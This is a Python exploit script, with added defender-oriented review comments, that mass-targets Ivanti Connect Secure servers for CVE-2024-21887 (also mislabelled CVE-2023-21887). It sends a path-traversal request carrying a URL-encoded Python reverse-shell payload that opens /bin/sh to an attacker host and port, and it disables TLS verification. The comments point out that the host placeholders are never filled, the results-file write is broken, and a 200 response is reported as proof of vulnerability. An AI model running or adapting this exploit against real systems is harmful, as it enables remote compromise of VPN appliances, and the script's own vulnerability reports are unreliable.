3xp.py
import argparse
from urllib.parse import *
import asyncio
import httpx
# Module metadata. The identifier recorded here is CVE-2024-21887 (the
# command-injection flaw in Ivanti Connect Secure / Policy Secure web
# components), while the class name, the argparse description and the default
# output file name further down all spell it "CVE-2023-21887".
__author__ = 'zwx'
__CVE__ = "CVE-2024-21887"
# Command string that CVE_2023_21887.exploit() URL-encodes and appends to the
# request path. It is a plain triple-quoted string (not an f-string) and
# nothing in this file formats it, so the "{host}" and "{port}" placeholders
# are sent as literal text; the --host/--port CLI values are stored on the
# scanner object but never read when the request is built.
# Detection note: requests produced by this file therefore carry the
# URL-encoded literal placeholders after the keys-status path, together with a
# ';'-delimited interpreter invocation, both of which are searchable in web
# and proxy logs.
payload = '''
;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((f"{host}",{port}));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())';
'''
class CVE_2023_21887:
    """Send the module-level ``payload`` to every URL listed in a file.

    The class name and ``self.name`` say CVE-2023-21887, whereas the module's
    ``__CVE__`` constant says CVE-2024-21887; the two spellings are kept as
    the author wrote them.

    Review notes for defenders reading this sample:

    * Each request is a GET whose path contains the traversal sequence
      ``/api/v1/totp/user-backup-code/../../license/keys-status/`` followed by
      URL-encoded command text. That path is the main log indicator for this
      tool; a client or intermediary may normalise the ``../`` segments, so
      matching on ``license/keys-status/`` followed by encoded shell
      metacharacters is the more robust search.
    * A target is reported as vulnerable on HTTP 200 alone. A 200 does not
      show that anything was executed, so the output is not a reliable
      assessment of exposure in either direction.
    * TLS certificate verification is switched off, so responses are not
      authenticated as coming from the listed host.
    * Remediation is the vendor's fix or published mitigation for the CVE;
      this file contains no version information to check against.
    """

    def __init__(self, target_file, output_file, host, port):
        # Label only; nothing else in this file reads it.
        self.name = "CVE-2023-21887"
        self.target_file = target_file
        self.output_file = output_file
        # Stored from the CLI but not read by any method below.
        self.host = host
        self.port = port

    async def exploit(self, url, session):
        """Request the injected path on *url* and report on the status code.

        Args:
            url: Base URL of one target, as read from the target file.
            session: The shared ``httpx.AsyncClient`` created in ``run``.
        """
        target_path = "/api/v1/totp/user-backup-code/../../license/keys-status/"
        # quote() percent-encodes the command string so it travels as part of
        # the URL path rather than as a query string or body.
        target_url = f"{url}{target_path}{quote(payload)}"
        print(f"[*] Checking {target_url}")
        headers = {
            "Content-Type": "application/json",
        }
        req = await session.get(target_url, headers=headers)
        # Only the status code is inspected; the response body is printed but
        # never examined for evidence that the command ran.
        if req.status_code == 200:
            print(f"[+] {url} is vulnerable")
            print(req.text)
            # NOTE(review): built-in open() returns a synchronous file object,
            # which does not implement the async context-manager protocol, so
            # as written this statement raises instead of appending the URL.
            async with open(self.output_file, "a") as file:
                await file.write(f"{url}\n")
        else:
            print(f"[-] {url} is not vulnerable")

    async def run(self):
        """Issue one request per listed URL, all scheduled concurrently."""
        # verify=False disables TLS certificate validation for every request.
        async with httpx.AsyncClient(verify=False) as client:
            # One coroutine per line of the target file; blank lines are not
            # filtered out, and there is no cap on concurrency.
            tasks = [self.exploit(url.strip(), client) for url in self.read_urls()]
            # gather() is called with its defaults, so the first exception
            # raised by any task propagates to the caller of run().
            await asyncio.gather(*tasks)

    def read_urls(self):
        """Return the lines of ``target_file`` with surrounding whitespace removed."""
        with open(self.target_file, "r") as file:
            return [line.strip() for line in file]
def parse_args():
    """Build the command-line parser and return the parsed namespace.

    Recognised arguments:
        --host: string, default "".
        --port: integer, default 443.
        -o / --output: results file name, default "CVE-2023-21887.txt".
        target_file: positional path to the URL list. argparse treats a
            positional without ``nargs`` as required, so the "list.txt"
            default given here is never applied.

    The description and default output name use the "CVE-2023-21887"
    spelling, unlike the module's ``__CVE__`` constant.
    """
    cli = argparse.ArgumentParser(description="CVE-2023-21887 Exploit Scanner")
    # (flags, keyword options) pairs, registered in the original order.
    argument_specs = [
        (("--host",), dict(default="", help="Host for reverse shell payload")),
        (
            ("--port",),
            dict(type=int, default=443, help="Port for reverse shell payload"),
        ),
        (
            ("-o", "--output"),
            dict(default="CVE-2023-21887.txt", help="Output file for results"),
        ),
        (
            ("target_file",),
            dict(default="list.txt", help="File containing a list of URLs to check"),
        ),
    ]
    for flags, options in argument_specs:
        cli.add_argument(*flags, **options)
    return cli.parse_args()
if __name__ == "__main__":
    # Script entry point: parse the CLI, build the scanner object from the
    # four parsed values, and drive its coroutine to completion.
    cli_options = parse_args()
    asyncio.run(
        CVE_2023_21887(
            cli_options.target_file,
            cli_options.output,
            cli_options.host,
            cli_options.port,
        ).run()
    )